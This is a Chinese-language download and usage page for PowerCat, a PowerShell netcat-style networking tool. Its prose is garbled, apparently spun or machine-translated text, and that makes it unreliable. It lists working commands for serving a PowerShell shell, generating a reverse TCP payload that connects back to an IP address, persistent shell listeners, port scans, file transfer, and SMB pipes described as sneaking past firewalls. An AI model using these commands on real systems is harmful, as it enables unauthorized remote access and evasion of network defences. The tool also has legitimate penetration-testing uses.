powershell专用网络工具

PowerCat是PowerShell的TCP/ IP瑞士军刀，适用Netcat Ncat.。假如你要在powershell上连SSH或是构建网络空间，那麼PowerCat肯定不可或缺！热烈欢迎免费下载！

PowerCat如何使用

powercat事实上是一个powershell的涵数，如果你第一次应用它的情况下你需要运作脚本制作来载入这一涵数。

因为windows默认设置不允许一切脚本制作运作，你需要键入Set-ExecutionPolicy RemoteSigned来容许运作当地的脚本制作。

PowerCat PowerShell控制模块装包。你务必导进控制模块应用其作用。

# Import the functions via the psd1 file:

Import-Module PowerCat.psd1

默认设置状况下,PowerCat应用TCP和载入/载入控制面板。

# Basic Listener:

Start-PowerCat -Port 443

# Basic Client:

Connect-PowerCat -RemoteIp 10.1.1.1 -Port 443

文件传送

应用sendfile PowerCat能够用于传输文件和-ReceiveFile主要参数。

# Send File:

Connect-PowerCat -RemoteIp 10.1.1.1 -Port 443 -SendFile C:\pathto\inputfile

# Receive File:

Start-PowerCat -Port 443 -ReceiveFile C:\pathto\outputfile

UDP和SMB

PowerCat适用多根据TCP传送数据。

# Send Data Over UDP:

Start-PowerCat -Mode Udp -Port 8000

# Send Data Over SMB (easily sneak past firewalls):

Start-PowerCat -Mode Smb -PipeName PowerCat

SSL

PowerCat动态性转化成给予SSL数据加密的X509资格证书TCP联接。

# Admin privileges are required to generate the self-signed certificate.

# Serve an SSL-Encrypted (Power)Shell:

Start-PowerCat -Mode Tcp -Port 80 -SslCn Certificate Common Name -Execute

# Connect to an SSL encrypted Ncat listener:

# Setup *nix with openssl Ncat:

# openssl req -X509 -newkey rsa:2048 -subj /CN=PowerCat -days 90 -keyout key.pem -out cert.pem

# ncat -l -p 80 --ssl --ssl-cert cert.pem --ssl-key key.pem

Connect-PowerCat -Mode Tcp -RemoteIp 10.1.1.1 -Port 80 -SslCn PowerCat

汽车继电器

PowerCat类似netcat汽车继电器汽车继电器,但你不用建立一个文档或运行一个过程。你还可以传送不一样合同中间的信息联接。

# UDP Listener to TCP Client Relay:

Start-PowerCat -Mode Udp -Port 8000 -Relay tcp:10.1.1.16:443

# TCP Listener to UDP Client Relay:

Start-PowerCat -Port 8000 -Relay udp:10.1.1.16:53

# TCP Client to Client Relay

Connect-PowerCat -RemoteIp 10.1.1.1 -Port 9000 -Relay tcp:10.1.1.16:443

# TCP Listener to SMB Listener Relay

New-PowerCat -Listener -Port 8000 -Relay smb:PowerCat

转化成的重力梯度

荷载能够应用New-PowerCatPayload涵数转化成。

# Generate a reverse tcp payload that connects back to 10.1.1.15 port 443:

New-PowerCatPayload -RemoteIp 10.1.1.15 -Port 443 -Execute

# Generate a tcp payload that listens on port 8000:

New-PowerCatPayload -Listener -Port 8000 -Execute

使用方法

PowerCat还能够实行端口扫描器,逐渐不断的观众,或做为一个简洁的web服务器。

# Basic TCP port scan:

1..1024 | ForEach-Object { Connect-PowerCat -RemoteIp 10.1.1.10 -Port $_ -Timeout 1 -Verbose -Disconnect }

# Basic UDP port scan:

1..1024 | ForEach-Object { Connect-PowerCat -Mode Udp -RemoteIp 10.1.1.10 -Port $_ -Timeout 1 -Verbose }

# Persistent listener:

Start-PowerCat -Port 443 -Execute -KeepAlive

# Simple Web Server:

Start-PowerCat -Port 80 -SendFile index.html

PowerCat基本要素和主要参数

Start-PowerCat # Starts a listener/server.

-Mode # Defaults to Tcp, can also specify Udp or Smb.

-Port # The port to listen on.

-PipeName # Name of pipe to listen on.

-SslCn # Common name for Ssl encrypting Tcp.

-Relay # Format: Mode:Port/PipeName

-Execute # Execute a console process or powershell.

-SendFile # Filepath of file to send.

-ReceiveFile # Filepath of file to be written.

-Disconnect # Disconnect after connecting.

-KeepAlive # Restart after disconnecting.

-Timeout # Timeout option. Default: 60 seconds

Connect-PowerCat # Connects a client to a listener/server.

-Mode # Defaults to Tcp, can also specify Udp or Smb

-RemoteIp # IPv4 address of host to connect to.

-Port # The port to connect to.

-PipeName # Name of pipe to connect to.

-SslCn # Common name for Ssl encrypting Tcp.

-Relay # Format: Mode:IP:Port/PipeName

-Execute # Execute a console process or powershell.

-SendFile # Filepath of file to send.

-ReceiveFile # Filepath of file to be written.

-Disconnect # Disconnect after connecting.

-Timeout # Timeout option. Default: 60 seconds